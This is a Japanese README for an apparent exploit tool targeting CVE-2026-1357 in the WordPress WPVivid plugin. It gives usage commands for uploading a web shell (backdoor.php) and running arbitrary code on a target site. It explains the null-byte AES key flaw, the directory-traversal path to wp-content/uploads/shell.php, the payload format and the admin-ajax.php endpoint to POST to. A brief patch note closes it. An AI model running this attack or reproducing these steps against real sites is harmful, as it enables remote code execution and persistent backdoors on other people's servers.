
CVE-2026-1357 の WordPress WPVivid プラグイン用エクスプロイト。細工された AES 暗号化ペイロードとディレクトリトラバーサルを介してリモートコード実行を可能にし、Webシェルをアップロードします。
pip3 install pycryptodome requests
python3 wpvivi.py http://target.com
python3 wpvivi.py http://target.com --shell backdoor.php
python3 wpvivi.py http://target.com --code "" 技術的な説明: Null Byte Key: RSA復号が失敗するとfalseが返り、phpseclibはそれを「\x00\x00\x00」として扱います。AES-128 ECBのキーとして16個のnullバイトを使用します。 Directory Traversal: ファイル名がサニタイズされておらず、../../../../wp-content/uploads/shell.php が可能です。 ペイロード形式:
[len_key_hex(2バイト)] + [key_hex] + [len_data_hex(16バイト)] + [encrypted_data] 実行: POSTを /wp-admin/admin-ajax.php?action=wpvivid_action&wpvivid_action=send_to_site に送信 wpvivid_content = base64(暗号化されたペイロード) 検出と緩和策:
0.9.124でパッチ適用済み:
if ($key === false || empty($key)) return false;